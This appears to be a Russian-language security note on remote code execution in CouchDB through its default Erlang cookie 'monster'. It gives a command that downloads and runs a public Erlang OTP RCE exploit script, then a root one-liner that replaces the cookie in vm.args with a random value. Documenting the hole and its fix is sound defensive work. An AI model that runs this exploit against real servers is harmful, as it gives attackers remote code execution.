CouchDB, Erlang и печеньки - RCE на дефолтных настройках
wget <https://raw.githubusercontent.com/sadshade/erlang-otp-rce/main/erlang-otp-rce.py>;
python3 erlang-otp-rce.py
Исправить эту проблему достаточно просто, необходимо заменить куку по умолчанию на что-то другое в файле /opt/couchdb/etc/vm.args
Вот такой однострочник, запущенный от имени суперпользователя, сделает всю работу:
COOKIE=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | head -c32);\\
sed -i "s/-setcookie\\ monster/-setcookie\\ ${COOKIE}/g"\\
/opt/couchdb/etc/vm.args
После чего необходимо перезапустить демон CouchDB.